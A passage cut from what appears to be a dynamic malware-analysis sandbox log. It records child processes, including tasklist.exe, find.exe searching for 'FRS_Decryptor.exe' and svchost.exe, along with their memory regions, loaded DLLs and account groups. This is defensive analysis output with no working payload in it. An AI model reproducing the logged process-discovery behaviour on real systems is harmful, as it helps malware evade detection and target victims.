SetThreadUILanguage (LangId=0x0) returned 0x409 [0073.199] exit (_Code=0) Process: id = "49" image_name = "tasklist.exe" filename = "c:\\windows\\syswow64\\tasklist.exe" page_root = "0x12f2a000" os_pid = "0x8c4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x95c" cmd_line = "tasklist" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2245 start_va = 0xa0000 end_va = 0xb6fff entry_point = 0xa0000 region_type = mapped_file name = "tasklist.exe" filename = "\\Windows\\SysWOW64\\tasklist.exe" (normalized: "c:\\windows\\syswow64\\tasklist.exe") Region: id = 2246 start_va = 0x340000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 2247 start_va = 0x360000 end_va = 0x361fff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 2248 start_va = 0x370000 end_va = 0x37efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 2249 start_va = 0x380000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 2250 start_va = 0x3c0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 2251 start_va = 0x400000 end_va = 0x403fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2252 start_va = 0x410000 end_va = 0x410fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 2253 start_va = 0x420000 end_va = 0x421fff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 2254 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2255 start_va = 0x7eb20000 end_va = 0x7eb42fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eb20000" filename = "" Region: id = 2256 start_va = 0x7eb44000 end_va = 0x7eb44fff entry_point = 0x0 region_type = private name = "private_0x000000007eb44000" filename = "" Region: id = 2257 start_va = 0x7eb4b000 end_va = 0x7eb4dfff entry_point = 0x0 region_type = private name = "private_0x000000007eb4b000" filename = "" Region: id = 2258 start_va = 0x7eb4e000 end_va = 0x7eb4efff entry_point = 0x0 region_type = private name = "private_0x000000007eb4e000" filename = "" Region: id = 2259 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2260 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2261 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2262 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 2264 start_va = 0x430000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 2265 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2266 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2267 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2286 start_va = 0x340000 end_va = 0x34ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 2287 start_va = 0x350000 end_va = 0x353fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 2288 start_va = 0x440000 end_va = 0x4bdfff entry_point = 0x440000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2289 start_va = 0x5e0000 end_va = 0x6dffff entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 2290 start_va = 0x73570000 end_va = 0x736b7fff entry_point = 0x73570000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 2291 start_va = 0x736c0000 end_va = 0x736d1fff entry_point = 0x736c0000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 2292 start_va = 0x73da0000 end_va = 0x73ddcfff entry_point = 0x73da0000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 2293 start_va = 0x73de0000 end_va = 0x73df3fff entry_point = 0x73de0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 2294 start_va = 0x73e10000 end_va = 0x73e18fff entry_point = 0x73e10000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 2295 start_va = 0x74310000 end_va = 0x74317fff entry_point = 0x74310000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 2296 start_va = 0x74d10000 end_va = 0x74d87fff entry_point = 0x74d10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2297 start_va = 0x74d90000 end_va = 0x74e16fff entry_point = 0x74d90000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 2298 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 2299 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2300 start_va = 0x75460000 end_va = 0x755aefff entry_point = 0x75460000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2301 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2302 start_va = 0x76c50000 end_va = 0x76d5bfff entry_point = 0x76c50000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2303 start_va = 0x76d70000 end_va = 0x76db0fff entry_point = 0x76d70000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 2304 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2305 start_va = 0x7ea20000 end_va = 0x7eb1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ea20000" filename = "" Region: id = 2306 start_va = 0x73530000 end_va = 0x7353ffff entry_point = 0x73530000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 2307 start_va = 0x73540000 end_va = 0x7355afff entry_point = 0x73540000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 2308 start_va = 0x73560000 end_va = 0x73569fff entry_point = 0x73560000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 2309 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2310 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2311 start_va = 0x74bc0000 end_va = 0x74d0dfff entry_point = 0x74bc0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2312 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2313 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2314 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 2315 start_va = 0x76ec0000 end_va = 0x76fc7fff entry_point = 0x76ec0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2329 start_va = 0x360000 end_va = 0x362fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 2330 start_va = 0x4c0000 end_va = 0x4c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2331 start_va = 0x4d0000 end_va = 0x4d0fff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 2332 start_va = 0x4e0000 end_va = 0x4e0fff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 2333 start_va = 0x4f0000 end_va = 0x4f3fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 2334 start_va = 0x500000 end_va = 0x500fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2335 start_va = 0x510000 end_va = 0x510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 2336 start_va = 0x520000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 2337 start_va = 0x560000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 2338 start_va = 0x5a0000 end_va = 0x5dffff entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 2339 start_va = 0x6e0000 end_va = 0x867fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Region: id = 2340 start_va = 0x870000 end_va = 0x8affff entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 2341 start_va = 0x8b0000 end_va = 0x8bffff entry_point = 0x0 region_type = private name = "private_0x00000000008b0000" filename = "" Region: id = 2342 start_va = 0x8c0000 end_va = 0xa40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = "" Region: id = 2343 start_va = 0xa50000 end_va = 0x1e4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a50000" filename = "" Region: id = 2344 start_va = 0x1e50000 end_va = 0x1f91fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e50000" filename = "" Region: id = 2345 start_va = 0x1fa0000 end_va = 0x2274fff entry_point = 0x1fa0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2346 start_va = 0x2280000 end_va = 0x267bfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002280000" filename = "" Region: id = 2347 start_va = 0x2680000 end_va = 0x26bffff entry_point = 0x0 region_type = private name = "private_0x0000000002680000" filename = "" Region: id = 2348 start_va = 0x26c0000 end_va = 0x26fffff entry_point = 0x0 region_type = private name = "private_0x00000000026c0000" filename = "" Region: id = 2349 start_va = 0x73420000 end_va = 0x7342ffff entry_point = 0x73420000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 2350 start_va = 0x73460000 end_va = 0x734a1fff entry_point = 0x73460000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 2351 start_va = 0x734b0000 end_va = 0x73510fff entry_point = 0x734b0000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 2352 start_va = 0x73520000 end_va = 0x7352bfff entry_point = 0x73520000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 2353 start_va = 0x73f20000 end_va = 0x73f3cfff entry_point = 0x73f20000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 2354 start_va = 0x73f40000 end_va = 0x73f6efff entry_point = 0x73f40000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2355 start_va = 0x73f70000 end_va = 0x73f87fff entry_point = 0x73f70000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 2356 start_va = 0x745f0000 end_va = 0x745f8fff entry_point = 0x745f0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 2357 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2358 start_va = 0x75360000 end_va = 0x75456fff entry_point = 0x75360000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2359 start_va = 0x75700000 end_va = 0x7577cfff entry_point = 0x75700000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 2360 start_va = 0x76dc0000 end_va = 0x76de4fff entry_point = 0x76dc0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2361 start_va = 0x7ea1d000 end_va = 0x7ea1ffff entry_point = 0x0 region_type = private name = "private_0x000000007ea1d000" filename = "" Region: id = 2362 start_va = 0x7eb45000 end_va = 0x7eb47fff entry_point = 0x0 region_type = private name = "private_0x000000007eb45000" filename = "" Region: id = 2363 start_va = 0x7eb48000 end_va = 0x7eb4afff entry_point = 0x0 region_type = private name = "private_0x000000007eb48000" filename = "" Region: id = 2803 start_va = 0x73370000 end_va = 0x7341afff entry_point = 0x73370000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 2884 start_va = 0x73340000 end_va = 0x7335afff entry_point = 0x73340000 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\SysWOW64\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wmiutils.dll") Thread: id = 95 os_tid = 0x434 Thread: id = 97 os_tid = 0x4ec Thread: id = 98 os_tid = 0x4e4 Thread: id = 99 os_tid = 0x4e0 Process: id = "50" image_name = "find.exe" filename = "c:\\windows\\syswow64\\find.exe" page_root = "0x11d39000" os_pid = "0x5a0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x95c" cmd_line = "find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2268 start_va = 0x850000 end_va = 0x86ffff entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 2269 start_va = 0x870000 end_va = 0x871fff entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 2270 start_va = 0x880000 end_va = 0x88efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 2271 start_va = 0x890000 end_va = 0x8cffff entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 2272 start_va = 0x8d0000 end_va = 0x90ffff entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 2273 start_va = 0x910000 end_va = 0x913fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000910000" filename = "" Region: id = 2274 start_va = 0x920000 end_va = 0x920fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000920000" filename = "" Region: id = 2275 start_va = 0x930000 end_va = 0x931fff entry_point = 0x0 region_type = private name = "private_0x0000000000930000" filename = "" Region: id = 2276 start_va = 0x11c0000 end_va = 0x11c6fff entry_point = 0x11c0000 region_type = mapped_file name = "find.exe" filename = "\\Windows\\SysWOW64\\find.exe" (normalized: "c:\\windows\\syswow64\\find.exe") Region: id = 2277 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2278 start_va = 0x7fbd0000 end_va = 0x7fbf2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007fbd0000" filename = "" Region: id = 2279 start_va = 0x7fbfb000 end_va = 0x7fbfdfff entry_point = 0x0 region_type = private name = "private_0x000000007fbfb000" filename = "" Region: id = 2280 start_va = 0x7fbfe000 end_va = 0x7fbfefff entry_point = 0x0 region_type = private name = "private_0x000000007fbfe000" filename = "" Region: id = 2281 start_va = 0x7fbff000 end_va = 0x7fbfffff entry_point = 0x0 region_type = private name = "private_0x000000007fbff000" filename = "" Region: id = 2282 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2283 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2284 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2285 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 2316 start_va = 0xac0000 end_va = 0xacffff entry_point = 0x0 region_type = private name = "private_0x0000000000ac0000" filename = "" Region: id = 2317 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2318 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2319 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2320 start_va = 0x850000 end_va = 0x85ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000850000" filename = "" Region: id = 2321 start_va = 0x940000 end_va = 0x9bdfff entry_point = 0x940000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2322 start_va = 0xa50000 end_va = 0xa5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 2323 start_va = 0xc00000 end_va = 0xcfffff entry_point = 0x0 region_type = private name = "private_0x0000000000c00000" filename = "" Region: id = 2324 start_va = 0x73430000 end_va = 0x73450fff entry_point = 0x73430000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\SysWOW64\\ulib.dll" (normalized: "c:\\windows\\syswow64\\ulib.dll") Region: id = 2325 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2326 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2327 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2328 start_va = 0x7fad0000 end_va = 0x7fbcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007fad0000" filename = "" Region: id = 2804 start_va = 0x860000 end_va = 0x863fff entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 2805 start_va = 0x870000 end_va = 0x873fff entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 2806 start_va = 0x73360000 end_va = 0x7336efff entry_point = 0x73360000 region_type = mapped_file name = "fsutilext.dll" filename = "\\Windows\\SysWOW64\\fsutilext.dll" (normalized: "c:\\windows\\syswow64\\fsutilext.dll") Thread: id = 96 os_tid = 0x4e8 Process: id = "51" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x5f5af000" os_pid = "0x324" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "49" os_parent_pid = "0x8c4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MMCSS" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\MsKeyboardFilter" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000a6d9" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 2364 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2365 start_va = 0xc61d2e0000 end_va = 0xc61d2effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c61d2e0000" filename = "" Region: id = 2366 start_va = 0xc61d2f0000 end_va = 0xc61d2f6fff entry_point = 0x0 region_type = private name = "private_0x000000c61d2f0000" filename = "" Region: id = 2367 start_va = 0xc61d300000 end_va = 0xc61d30efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c61d300000" filename = "" Region: id = 2368 start_va = 0xc61d310000 end_va = 0xc61d38ffff entry_point = 0x0 region_type = private name = "private_0x000000c61d310000" filename = "" Region: id = 2369 start_va = 0xc61d390000 end_va = 0xc61d393fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c61d390000" filename = "" Region: id = 2370 start_va = 0xc61d3a0000 end_va = 0xc61d3a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c61d3a0000" filename = "" Region: id = 2371 start_va = 0xc61d3b0000 end_va = 0xc61d3b1fff entry_point = 0x0 region_type = private name = "private_0x000000c61d3b0000" filename = "" Region: id = 2372 start_va = 0xc61d3c0000 end_va = 0xc61d43dfff entry_point = 0xc61d3c0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2373 start_va = 0xc61d440000 end_va = 0xc61d446fff entry_point = 0x0 region_type = private name = "private_0x000000c61d440000" filename = "" Region: id = 2374 start_va = 0xc61d450000 end_va = 0xc61d452fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c61d450000" filename = "" Region: id = 2375 start_va = 0xc61d460000 end_va = 0xc61d460fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c61d460000" filename = "" Region: id = 2376 start_va = 0xc61d470000 end_va = 0xc61d470fff entry_point = 0x0 region_type = private name = "private_0x000000c61d470000" filename = "" Region: id = 2377 start_va = 0xc61d480000 end_va = 0xc61d480fff entry_point = 0x0 region_type = private name = "private_0x000000c61d480000" filename = "" Region: id = 2378 start_va = 0xc61d490000 end_va = 0xc61d490fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c61d490000" filename = "" Region: id = 2379 start_va = 0xc61d4a0000 end_va = 0xc61d4a0fff entry_point = 0x0 region_type = pagefile_backed name 